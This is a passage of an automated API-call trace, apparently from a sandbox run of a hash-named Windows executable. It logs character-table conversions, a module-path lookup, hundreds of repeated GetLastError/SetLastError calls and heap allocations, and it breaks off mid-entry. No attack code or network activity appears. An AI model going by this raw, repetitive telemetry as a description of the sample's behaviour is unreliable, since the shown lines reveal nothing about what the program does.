!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿac?\x8cPú\x19", lpUsedDefaultChar=0x0) returned 256 [0081.537] GetLastError () returned 0x57 [0081.537] SetLastError (dwErrCode=0x57) [0081.537] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f918, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.537] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f918, cbMultiByte=256, lpWideCharStr=0x19f268, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.537] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0081.537] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f058, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0081.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19f718, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿac?\x8cPú\x19", lpUsedDefaultChar=0x0) returned 256 [0081.537] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4d5658, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x62 [0081.541] GetLastError () returned 0x0 [0081.541] SetLastError (dwErrCode=0x0) [0081.541] GetLastError () returned 0x0 [0081.541] SetLastError (dwErrCode=0x0) [0081.541] GetLastError () returned 0x0 [0081.541] SetLastError (dwErrCode=0x0) [0081.541] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.542] SetLastError (dwErrCode=0x0) [0081.542] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.543] SetLastError (dwErrCode=0x0) [0081.543] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.544] SetLastError (dwErrCode=0x0) [0081.544] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.545] SetLastError (dwErrCode=0x0) [0081.545] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.546] SetLastError (dwErrCode=0x0) [0081.546] GetLastError () returned 0x0 [0081.547] SetLastError (dwErrCode=0x0) [0081.547] GetLastError () returned 0x0 [0081.547] SetLastError (dwErrCode=0x0) [0081.547] GetLastError () returned 0x0 [0081.547] SetLastError (dwErrCode=0x0) [0081.548] GetLastError () returned 0x0 [0081.548] SetLastError (dwErrCode=0x0) [0081.548] GetLastError () returned 0x0 [0081.548] SetLastError (dwErrCode=0x0) [0081.548] GetLastError () returned 0x0 [0081.548] SetLastError (dwErrCode=0x0) [0081.548] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.549] SetLastError (dwErrCode=0x0) [0081.549] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.550] SetLastError (dwErrCode=0x0) [0081.550] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.551] GetLastError () returned 0x0 [0081.551] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.552] SetLastError (dwErrCode=0x0) [0081.552] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x6b) returned 0x29a1710 [0081.553] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] GetLastError () returned 0x0 [0081.553] SetLastError (dwErrCode=0x0) [0081.553] GetLastError () returned 0x0 [0081.557] SetLastError (dwErrCode=0x0) [0081.557] GetLastError () returned 0x0 [0081.557] SetLastError (dwErrCode=0x0) [0081.557] GetLastError () returned 0x0 [0081.557] SetLastError (dwErrCode=0x0) [0081.557] GetLastError () returned 0x0 [0081.557] SetLastError (dwErrCode=0x0) [0081.557] GetLastError () returned 0x0 [0081.557] SetLastError (dwErrCode=0x0) [0081.557] GetLastError () returned 0x0 [0081.557] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.558] GetLastError () returned 0x0 [0081.558] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.559] SetLastError (dwErrCode=0x0) [0081.559] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.560] SetLastError (dwErrCode=0x0) [0081.560] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.561] GetLastError () returned 0x0 [0081.561] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.562] GetLastError () returned 0x0 [0081.562] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.563] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.563] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.563] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.563] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.563] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.563] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.563] SetLastError (dwErrCode=0x0) [0081.563] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.564] SetLastError (dwErrCode=0x0) [0081.564] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.565] GetLastError () returned 0x0 [0081.565] SetLastError (dwErrCode=0x0) [0081.566] GetLastError () returned 0x0 [0081.566] SetLastError (dwErrCode=0x0) [0081.566] GetLastError () returned 0x0 [0081.566] SetLastError (dwErrCode=0x0) [0081.566] GetLastError () returned 0x0 [0081.566] SetLastError (dwErrCode=0x0) [0081.566] GetLastError () returned 0x0 [0081.566] SetLastError (dwErrCode=0x0) [0081.566] GetLastError () returned 0x0 [0081.566] SetLastError (dwErrCode=0x0) [0081.566] GetLastError () returned 0x0 [0081.566] SetLastError (dwErrCode=0x0) [0081.574] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x90) returned 0x29a1788 [0081.574] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x1f) returned 0x29a1820 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x2e) returned 0x29a1848 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x37) returned 0x29a1880 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x3c) returned 0x29a18c0 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x31) returned 0x29a1908 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x14) returned 0x29a1948 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x24) returned 0x29a1968 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd) returned 0x29a1998 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x1d) returned 0x29a19b0 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x31) returned 0x29a19d8 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x15) returned 0x29a1a18 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x17) returned 0x29a1a38 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xe) returned 0x29a1a58 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x69) returned 0x29a1a70 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x3e) returned 0x29a1ae8 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x1b) returned 0x29a1b30 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x1d) returned 0x29a1b58 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x48) returned 0x29a1b80 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x12) returned 0x29a1bd0 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x18) returned 0x29a1bf0 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x1b) returned 0x29a1c10 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x24) returned 0x29a1c38 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x29) returned 0x29a1c68 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x1e) returned 0x29a1ca0 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x6b) returned 0x29a1cc8 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x17) returned 0x29a1d40 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xf) returned 0x29a1d60 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, 